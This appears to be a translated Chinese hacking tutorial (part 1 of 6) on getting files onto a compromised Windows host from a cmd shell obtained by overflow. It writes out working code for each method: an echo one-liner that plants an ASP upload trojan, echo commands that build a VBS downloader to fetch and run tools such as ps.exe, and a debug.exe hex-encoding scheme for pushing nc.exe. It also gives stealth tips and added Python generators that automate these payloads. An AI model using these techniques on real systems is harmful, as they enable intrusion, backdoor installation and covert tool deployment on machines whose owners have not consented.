Do everything in a cmd shell: the whole job from the command line (part 1 of 6) [dos/bat]

Source: Internet
Author: User
Tags: echo command
File transfer
For a cmd shell obtained through an overflow, the biggest problem is how to upload files. Because of the spread of worms, ports 139 and 445, which are needed to connect to ipc$, are blocked at routers. On top of that, Windows XP tightened the protection of ipc$, so uploading through ipc$ and the default shares is basically no longer workable. FTP and TFTP are two feasible methods; since they are well known, this article does not cover them. There are three other familiar ways, which I summarize here again:

1, use the echo command to write an ASP trojan.
The premise, of course, is that IIS is already installed on the target host.
Ordinary ASP trojans are "bulky" and not suited to being written with echo directly, so here is a compact one.
The echo version, given directly:

@echo ^<%with server.createobject("adodb.stream"):.type=1:.open:.write request.binaryread(request.totalbytes):.savetofile request.querystring("s"),2:end with%^> >up.asp

Note that this is a single line with no carriage return in the middle; the ^ in front of < and > keeps cmd from treating them as redirections. The page writes whatever is POSTed to it into the physical path given in the s= query parameter, so the IIS anonymous account must be allowed to write there.
The generated up.asp cannot be used from a browser; it is driven only by the following script, which POSTs the raw bytes of a local file to it (save it locally as up.vbs):

with wscript
if .arguments.count<3 then .quit
set fso=createobject("scripting.filesystemobject")
if not fso.fileexists(.arguments(0)) then .quit
set so=createobject("adodb.stream"):so.type=1:so.open:so.loadfromfile .arguments(0)
set xh=createobject("microsoft.xmlhttp")
xh.open "post",.arguments(1)&"?s="&.arguments(2),false
xh.send so.read
end with

The three arguments are the local file, the URL of up.asp on the target, and the path where the file is to be saved on the target. For example, with up.asp in the web root of the target host:

cscript up.vbs c:\path\file.exe http://target/up.asp c:\path\file.exe

Note that this one runs on the local machine.

2, use the echo command to write a VBS download script.
If the target host can reach the web, four echo commands produce a small downloader, dl.vbs (again, ^ escapes the < and > characters):

@echo with wscript:if .arguments.count^<2 then .quit >dl.vbs
@echo set aso=.createobject("adodb.stream"):set w=createobject("microsoft.xmlhttp") >>dl.vbs
@echo w.open "get",.arguments(0),0:w.send:if w.status^>200 then .echo "Error:"^&w.status:.quit >>dl.vbs
@echo aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbs

For example, to download ps.exe and save it under c:\path:

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe

Note that this is executed in the remote shell.
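Both scripts above are delivered the same way: each line of the script becomes one echo command, and every character cmd would interpret (<, >, &, |, ^) has to be escaped by hand. The following generator automates that. It is an added example and not code from the original article; the function names, the redirect-first command form and the small cmd emulation used to check the result are my own. The sample input is the dl.vbs above, embedded as constructed data.

```python
import re

# Characters cmd interprets outside double quotes; inside quotes they are literal.
_CMD_META = set('^<>&|')


def cmd_escape(line: str) -> str:
    """Escape one line of script text so that `echo <text>` writes it verbatim.
    Tracks double quotes: cmd does not treat ^ < > & | specially inside a
    quoted region, so escaping there would leave a stray caret in the file."""
    out, in_quote = [], False
    for ch in line:
        if ord(ch) >= 128:
            # The article observes that echo cannot pass bytes >= 128 intact;
            # refuse rather than silently corrupt the script.
            raise ValueError("non-ASCII character cannot be sent with echo: %r" % ch)
        if ch == '"':
            in_quote = not in_quote
        elif ch in _CMD_META and not in_quote:
            out.append('^')
        out.append(ch)
    return ''.join(out)


def echo_commands(script_lines, target: str):
    """Return the cmd commands that write `script_lines` to `target`.
    The redirection comes first (`>>file echo text`) so a line ending in a
    digit is never misparsed as a handle number (`echo x 1>file`), and an empty
    line is written with `echo.`, because a bare `echo` prints "ECHO is on."."""
    cmds = []
    for n, line in enumerate(script_lines):
        redir = '>' if n == 0 else '>>'      # create on the first line, append after
        body = 'echo.' if line == '' else 'echo ' + cmd_escape(line)
        cmds.append('%s%s %s' % (redir, target, body))
    return cmds


_CMD_RE = re.compile(r'^(>>?)(\S+) echo(?:\.|$| (.*))$')


def emulate_cmd(cmds):
    """Emulate, as a check, what an interactive cmd shell writes for the
    commands above: strip the redirection and `echo`, drop carets outside
    quotes. Variable expansion (%var%) is not modelled. Returns {file: text}."""
    files = {}
    for c in cmds:
        m = _CMD_RE.match(c)
        if not m:
            raise ValueError("not a generated echo command: " + c)
        mode, name, text = m.groups()
        text = text or ''
        out, in_quote, i = [], False, 0
        while i < len(text):
            ch = text[i]
            if ch == '"':
                in_quote = not in_quote
            elif ch == '^' and not in_quote and i + 1 < len(text):
                i += 1                        # caret: the next character is literal
                ch = text[i]
            out.append(ch)
            i += 1
        files[name] = ('' if mode == '>' else files.get(name, '')) + ''.join(out) + '\r\n'
    return files


# Constructed sample: the four lines of dl.vbs from the article.
DL_VBS = [
    'with wscript:if .arguments.count<2 then .quit',
    'set aso=.createobject("adodb.stream"):set w=createobject("microsoft.xmlhttp")',
    'w.open "get",.arguments(0),0:w.send:if w.status>200 then .echo "Error:"&w.status:.quit',
    'aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile .arguments(1),2:end with',
]


def check_roundtrip(lines, target='dl.vbs') -> bool:
    """True when emulating the generated commands reproduces the script exactly."""
    return emulate_cmd(echo_commands(lines, target))[target] == '\r\n'.join(lines) + '\r\n'


if __name__ == '__main__':
    for c in echo_commands(DL_VBS, 'dl.vbs'):
        print(c)
    print('round trip ok:', check_roundtrip(DL_VBS))
```

The emulation covers the interactive shell the article pastes into. If the commands are saved into a .bat file instead, every % must be doubled, and ! as well when delayed expansion is on; neither is handled here.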

3, echo an encoded copy of any file, then restore it with a script plus debug.
The previous two methods cannot guarantee getting through a firewall. Besides, unless you run your own web server, tools found on the web usually come as compressed archives; if the target host has no decompression tool you are still stuck. Then only the "killer" is left.

The echo command outputs characters with an ASCII code below 128 correctly, but those at or above 128 come out altered. So the local file has to be re-encoded as displayable characters before it can be written to the remote host easily. The first idea is Base64, the encoding used for mail attachments. But VBS has no shift operators, so encoding and decoding are clumsy. Worse, scripts handle binary streams poorly. (ADODB.Stream can write a stream to a file, but I could not construct the matching data type; a binary stream can be turned into a string with MidB, but not the reverse. I spent two days on this without solving it. If anyone knows how to write arbitrary bytes to a file from VBS or JS, please enlighten me.)

So there was nothing for it but debug.exe. Many people know the principle, so I will not explain it and just give the result, the encoding script:

fp=wscript.arguments(0)
fn=right(fp,len(fp)-instrrev(fp,"\"))
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl\65536
with createobject("scripting.filesystemobject").opentextfile(fp&".bat",2,true)
.write "@echo str="""
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt<16 then .write "0"
.write hex(bt)
if i mod 128=0 then .write """_>>debug.vbs"+vbcrlf+"@echo +"""
next
.writeline """>>debug.vbs"+vbcrlf+"@echo with wscript.stdout:r=vbcrlf" _
+":for i=1 to len(str) step 48:.write ""e""+hex(256+(i-1)/2)" _
+":for j=i to i+46 step 2:.write "" ""+mid(str,j,2):next:.write r:next>>debug.vbs"
.writeline "@echo .write ""rbx""+r+"""+hex(slh)+"""+r+""rcx""+r+"""+hex(sll) _
+"""+r+""n debug.tmp""+r+""w""+r+""q""+r:end with" _
+">>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp """&fn&"""&del debug.vbs"
end with

Save it as echo.vbs. To upload nc.exe, enter at the local command line:

cscript echo.vbs nc.exe

You can also drag the icon of the file you want to transfer onto the icon of the script file.
After a moment an nc.exe.bat appears next to nc.exe (in the current directory when invoked as above). Open it with an editor such as Notepad and you will see the following:

@echo str="4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000080000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000"_>>debug.vbs
@echo +"504500004c010400b98eae340000000000000000e0000f010b010500009800000062000000000000004c00000010000000b00000000040000010000000020000040000000000000004000000000000000030010000040000000000000300000000001000001000000000100000100000000000001000000000000000000000000"_>>debug.vbs
@echo +"002001003c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0210100640100000000000000000000000000000000000000000000000000002e74657874000000"_>>debug.vbs
@echo +"70970000001000000098000000040000000000000000000000000000200000602e726461746100001704000000b0000000060000009c0000000000000000000000000000400000402e646174610000004452000000c00000003e000000a20000000000000000000000000000400000c02e696461746100005c07000000200100"_>>debug.vbs
............ (several lines omitted)
@echo +"">>debug.vbs
@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write "e"+hex(256+(i-1)/2):for j=i to i+46 step 2:.write " "+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write "rbx"+r+"0"+r+"rcx"+r+"E800"+r+"n debug.tmp"+r+"w"+r+"q"+r:end with>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp "nc.exe"&del debug.vbs

Select all, copy, switch to the remote command-line window, paste.
Unless the link is very slow, the whole upload takes about 20 seconds.

A few notes:
1, transferring large files is unstable and may kill the shell, so the smaller the file the better. I recommend that the original file not exceed 100KB.
2, before transferring a large file, send a small file first as a "warm-up", so that the 16-bit virtual machine ntvdm.exe stays resident in the background. After all files are across, kill the ntvdm process for the sake of stealth.
3, some cmd shells need two carriage returns after each command; there nc.exe.bat cannot be used as-is.
4, a single command has a length limit, so one echo cannot do the whole job. Also, in the cmd shell provided by nc, a slightly longer command makes the shell exit on its own (an overflow?). You can change the 128 in the "i mod 128=0" statement to adjust the length of each echo command; each echo then carries twice that many characters, since every byte becomes two hex digits.
5, decoding can also be done without a script. The point of the script is to reduce the amount of data transferred: the hex is sent packed, and the script expands it into debug's e lines on the target. When I have time I will write a better script with real compression and data verification.
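To make the encoding checkable offline, here is the same scheme re-implemented in Python: a generator that emits the .bat text exactly as echo.vbs does, a function that recovers the packed hex from it, the expansion into debug's e/rbx/rcx/n/w/q commands that debug.vbs performs on the target, and a minimal emulation of those debug.exe commands so the whole chain can be round-tripped. This is an added example and not the article's code; the function names are mine, the 64 KiB size check is my assumption (debug's e command takes a 16-bit offset), and the sample bytes are constructed. The chunk parameter is the 128 from note 4.

```python
import re

DEBUG_ORG = 0x100      # debug.exe edits and writes from CS:0100
CHUNK = 128            # bytes per @echo line: the "i mod 128=0" in echo.vbs (note 4)
BYTES_PER_E = 24       # 48 hex digits per debug "e" line: the "step 48" loop


def make_bat(data: bytes, target_name: str, chunk: int = CHUNK) -> str:
    """Build the same .bat text that echo.vbs produces: @echo lines that write
    debug.vbs on the target, pipe its output into debug.exe and rename the
    result to `target_name`."""
    if not data:
        raise ValueError("empty file")
    # Assumption (not stated in the article): debug's "e" takes a 16-bit offset,
    # so the data must fit below 0x10000 once placed at 0x100.
    if DEBUG_ORG + len(data) > 0x10000:
        raise ValueError("file too large for one 64 KiB debug segment")
    hx = data.hex()
    parts = [hx[i:i + 2 * chunk] for i in range(0, len(hx), 2 * chunk)]
    out = ['@echo str="%s"_>>debug.vbs' % parts[0]]            # VBS: str="..."_
    out += ['@echo +"%s"_>>debug.vbs' % p for p in parts[1:]]   # VBS: +"..."_
    out.append('@echo +"">>debug.vbs')                          # closes the expression
    # The VBS loop that unpacks the hex into "e <offset> <bytes>" lines on the target.
    out.append('@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:'
               '.write "e"+hex(256+(i-1)/2):for j=i to i+46 step 2:'
               '.write " "+mid(str,j,2):next:.write r:next>>debug.vbs')
    slh, sll = divmod(len(data), 0x10000)   # debug takes the file length as BX:CX
    out.append('@echo .write "rbx"+r+"%X"+r+"rcx"+r+"%X"+r+"n debug.tmp"+r+"w"+r+"q"+r'
               ':end with>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul'
               '&&ren debug.tmp "%s"&del debug.vbs' % (slh, sll, target_name))
    return "\r\n".join(out) + "\r\n"


_HEX_LINE = re.compile(r'^@echo (?:str=|\+)"([0-9a-fA-F]*)"_?>>debug\.vbs$')


def hex_from_bat(bat: str) -> str:
    """Recover the packed hex from the .bat: the value `str` gets in debug.vbs."""
    return "".join(m.group(1) for m in map(_HEX_LINE.match, bat.splitlines()) if m)


def debug_script(hx: str) -> str:
    """What `cscript //nologo debug.vbs` pipes into debug.exe, mirroring the VBS
    loop: 24 bytes per "e" line, then the length in BX:CX, name, write, quit."""
    lines = []
    for i in range(0, len(hx), 2 * BYTES_PER_E):
        seg = hx[i:i + 2 * BYTES_PER_E]
        lines.append("e%X " % (DEBUG_ORG + i // 2)
                     + " ".join(seg[j:j + 2] for j in range(0, len(seg), 2)))
    slh, sll = divmod(len(hx) // 2, 0x10000)
    lines += ["rbx", "%X" % slh, "rcx", "%X" % sll, "n debug.tmp", "w", "q"]
    return "\r\n".join(lines) + "\r\n"


def emulate_debug(script: str):
    """Minimal emulation of the debug.exe commands the script uses, for checking
    the encoding offline. Returns (file name from "n", bytes written by "w").
    "r<reg>" reads the new value from the following line, as debug prompts for it."""
    mem, regs, name, written = bytearray(0x10000), {"bx": 0, "cx": 0}, None, None
    lines, k = script.splitlines(), 0
    while k < len(lines):
        ln = lines[k].strip()
        k += 1
        if not ln:
            continue
        cmd, rest = ln[0].lower(), ln[1:].strip()
        if cmd == "e":                       # e <offset> <byte> <byte> ...
            toks = rest.split()
            off = int(toks[0], 16)
            for t in toks[1:]:
                mem[off] = int(t, 16)
                off += 1
        elif cmd == "r":                     # rbx / rcx, value on the next line
            regs[rest.lower()] = int(lines[k].strip(), 16)
            k += 1
        elif cmd == "n":
            name = rest
        elif cmd == "w":                     # write BX:CX bytes starting at CS:0100
            length = (regs["bx"] << 16) | regs["cx"]
            written = bytes(mem[DEBUG_ORG:DEBUG_ORG + length])
        elif cmd == "q":
            break
        else:
            raise ValueError("unsupported debug command: " + ln)
    return name, written


def roundtrip(data: bytes, target_name: str = "nc.exe") -> bool:
    """Encode, recover the hex from the .bat, run it through the emulated
    debug.exe and compare with the original bytes."""
    name, out = emulate_debug(debug_script(hex_from_bat(make_bat(data, target_name))))
    return name == "debug.tmp" and out == data


# Constructed sample input (not a real binary): an MZ signature followed by
# 300 varied bytes, so that the last @echo and the last "e" line are partial.
SAMPLE = b"MZ\x90\x00" + bytes((i * 7) & 0xFF for i in range(300))

if __name__ == "__main__":
    print(make_bat(SAMPLE, "sample.bin"))
    print("round trip ok:", roundtrip(SAMPLE))
```

Running it prints a .bat of the same shape as the nc.exe.bat above and confirms the round trip. The size check is the practical limit of this variant: with the data placed at offset 0x100, everything has to fit in one 64 KiB segment, which is why nc.exe at 0xE800 bytes works but a file near the 100KB mentioned in note 1 would need e commands with an explicit segment.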

Once you can upload files, everything else is of course easy, but many operations are more convenient with the tools Windows already ships. When hunting everywhere for the tools you need, do not forget Windows itself.